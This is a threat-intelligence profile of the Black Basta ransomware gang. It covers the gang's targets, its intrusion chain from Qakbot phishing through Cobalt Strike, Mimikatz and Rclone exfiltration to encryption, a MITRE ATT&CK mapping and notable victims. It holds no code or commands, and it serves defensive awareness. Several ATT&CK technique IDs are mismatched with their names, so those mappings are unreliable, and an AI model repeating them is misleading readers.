Black Basta – Ransomware Group

Overview

On April 20, 2022, a user named Black Basta posted on underground forums known as XSS.IS and EXPLOIT.IN to advertise that it intends to buy and monetize corporate network access credentials for a share of the profits.

The advertisement also specified that it was looking for organizations based in the United States, Canada, United Kingdom, Australia, and New Zealand, which are all English-speaking countries. A report noted that malicious actors acquired stolen credentials from some darknet websites that peddle an enormous amount of exfiltrated data to the underground market.

Like other enterprise-focused ransomware operations, Black Basta employs a double extortion scheme that involves exfiltrating confidential data before encryption to threaten victims with public release of the stolen data.

The gang carries out the extortion phase of its attacks on its Tor site, Basta News, which contains a list of all the victims who have not paid the ransom. The threat actors behind Black Basta were suspected to be a rebrand of the ransomware gang, Conti. When Black Basta hit the scene in April 2022, researchers stated that the ransomware gang shared similarities with Conti.

For example, Black Basta’s data leak site was very similar to Conti’s data leak site. The gangs also shared the same victim recovery portals. However, Conti denied that they rebranded as Black Basta and called the group “kids”. Despite this declaration, researchers still held the belief that Conti rebranded as Black Basta.

Common targets

Black Basta targets organizations in the US, Japan, Canada, the United Kingdom, Australia, and New Zealand in highly targeted attacks rather than employing a spray-and-pray approach.

Entities that collect large amounts of data that is attractive for extortion operations such as personally identifiable information (PII), financial information, or other sensitive data, are likely to stand out as lucrative targets for attackers.

Black Basta ransomware is observed to target industries across a wide range:

• Manufacturing
• Construction
• Transportation
• Telcos
• Pharmaceuticals
• Cosmetics
• Plumbing
• Heating
• Automobile dealers
• Undergarments manufacturers

Attack Vectors

Initial access is often acquired via malicious links in spearphishing emails. Common tools used by Black Basta are Qakbot, SystemBC, Mimikatz, CobaltStrike and Rclone.

How they operate

Black Basta often gains initial access via a link to a malicious document delivered by email in the form of a password-protected zip file. Once extracted, the document installs the Qakbot banking trojan to establish backdoor access and deploy SystemBC, which establishes an encrypted connection to a C2 server. Often, Black Basta will acquire network persistence via legitimate remote access software tools.

Next, the post-exploitation framework known as CobaltStrike is installed for reconnaissance and deploying additional tooling across the network. Unlike most threat actors, Black Basta utilizes numerous tool deployment and remote access methods.

Black Basta often attempts to disable security tooling via premade scripts that interact with the registry. Kroll has also observed attempts to remove or disable endpoint detection and response systems to conceal the deployment of tools such as Mimikatz and CobaltStrike.

One of Black Basta’s primary objectives is to exfiltrate data. Most often, this is achieved with Rclone, which can filter for specific files before copying them to a cloud service. Once exfiltration is complete, the ransomware binary is executed to encrypt files with the “.basta” extension, delete volume shadow copies, and display a ransom note named readme.txt on infected devices.

Black Basta loiter time is typically two to three days. However, an extended hibernation time sometimes occurs after the initial Qakbot infection. This may indicate that initial access is being sold to associated threat actors.

Once Black Basta gains initial access, it deploys a range of second-stage tactics to acquire Windows Domain credentials and penetrate a target’s network laterally, steal sensitive data, and deploy ransomware.

After infecting the target network the ransomware performs the following actions:-

• Reconnaissance
• Collect data
• Credentials
• Move laterally
• Download payloads
• Execute payloads

In order to gain access to the Domain Controller, the attacker needs to harvest the credentials as well as understand the network structure and then using PsExec traverse to the next computer.

In the case of a successful breach, the attacker will perform a final procedure aimed at avoiding detection in order to hide their illicit activities.

Moreover, before encrypting files themselves, ransomware typically deletes shadow copies of files and other backups using VSSadmin.exe. At the end of the attack, the ransomware is deployed to the targeted endpoints, and this completes the final stage of the attack.

The files are encrypted using the ChaCha20 algorithm, with the key and nonce being encrypted using the RSA public key that is hard-coded in the sample. The malware can fully or partially encrypt a file depending on its size. The extension of the encrypted files is changed to .basta by the ransomware.

MITRE ATT&CK Techniques

Initial Access

• Phishing (T1566)

Execution

• User Execution: Malicious Image (T1204.003)
• System Services: Service Execution (T1569.002)

Persistence

• Create Accounts: Local Account (T1136.001)

Defense Evasion

• Subvert Trust Controls: Mark-of-the-Web Bypass (T1553.005)
• Use Alternate Authentication Material: Pass the Hash (T1550.002)
• Process Injection (T1055)

Credential Access

• Credentials From Password Stores (T1555)

Discovery

• System Network Connections Discovery (T1049)
• Network Share Discovery (T1018)

Command and Control

• Ingress Tool Transfer (T1105)
• Application Layer Protocol: Web Protocols (T1071.001)
• Protocol Tunnelling (T1572)
• Remote Access Software (T1219)

Privilege Escalation

• Valid Accounts (T1078)

Lateral Movement

• Remote Services: remote Desktop Protocl (T1021.001)
• Remote Services: SMB/Windows Admin Shares (T1021.002)
• Remote Service Session Hijacking: RDP Hijacking (T1536.002)

Collection

• Data From Local System (T1005)

Significant Attacks

• On April 2022, the American Dental Association (ADA) was hit by a cyberattack, causing them to shut down portions of their network while investigating the attack.
• German wind farm operator Deutsche Windtechnik confirmed its IT systems were targeted by a cyberattack on the night between April 11 and 12. 
• Toronto Public Library Outages Caused by Black Basta Ransomware Attack
• Chilean Government Warns of Black Basta Ransomware Attacks after Customs Incident (
• Black Basta Ransomware Attack to Cost Capita over £15M

References:

• Black Basta Ransomware Emerging From Underground to Attack Corporate Networks
• Black Basta Ransomware Operators Expand Their Attack Arsenal With QakBot Trojan and PrintNightmare Exploit
• Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike
• Black Basta – Technical Analysis
• Black Basta
• HC3: Threat Profile